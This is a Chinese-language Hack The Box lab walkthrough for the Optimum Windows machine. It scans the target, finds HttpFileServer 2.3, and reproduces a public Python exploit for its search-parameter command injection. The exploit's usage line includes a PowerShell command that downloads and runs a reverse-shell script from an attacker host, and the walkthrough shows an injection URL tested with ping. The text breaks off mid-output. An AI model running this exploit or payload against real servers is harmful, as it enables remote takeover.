HTB靶场系列 Windows靶机 Optimum靶机

勘探

依然是nmap扫描

nmap 10.10.10.8
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 21:58 EST
Nmap scan report for 10.10.10.8
Host is up (0.031s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

初步扫描发现只开了80端口,那么具体扫描一下

nmap -p 80 -sCV 10.10.10.8
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 21:59 EST
Nmap scan report for 10.10.10.8
Host is up (0.023s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.29 seconds

发现运行了hfs而且是2.3版本

那么我们来具体查看一下80端口

80端口

打开直接访问10.10.10.8发现是一个hfs的界面,没有其他的什么东西

HTB靶场系列 Windows靶机 Optimum靶机_第1张图片

那么我们猜测多半是利用hfs中间件漏洞,先用searchsploit搜索一下可以利用的漏洞

searchsploit httpfileserver
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command | windows/webapps/49125.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results

发现就一个而且正好还是2.3版本的,那么好了多半就是个利用这个漏洞的靶机

查看一下这个exp

searchsploit -x windows/webapps/49125.py

#!/usr/bin/python3

# Usage :  python3 Exploit.py   
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"

import urllib3
import sys
import urllib.parse

try:
        http = urllib3.PoolManager()    
        url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{
  {.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
        print(url)
        response = http.request('GET', url)
        
except Exception as ex:
        print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
        print(ex)

很简单,大概就是说这个中间件的搜索功能存在命令注入,那么我们按照他的exp构造利用链接

http://10.10.10.8/?search=%00{.+exec|cmd.exe+/c+ping+/n+1+10.10.16.3.}

这样,让目标机器ping一下自己,可以检验这个漏洞是否可以使用,如果可以使用的话,我们tcpdump会受到

一个icmp的包

sudo tcpdump -i tun0 icmp and src 10.10.10.8
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
16:16:51.416240 IP 10.10.10.8 > 10.10.14.10: ICMP echo request, id 1, seq 117, length 40
16:16:51.416294 IP 10.10.10.8 > 10.10.14.10: ICMP ec

你可能感兴趣的:(HTB,安全,渗透测试,powershell,web安全,python)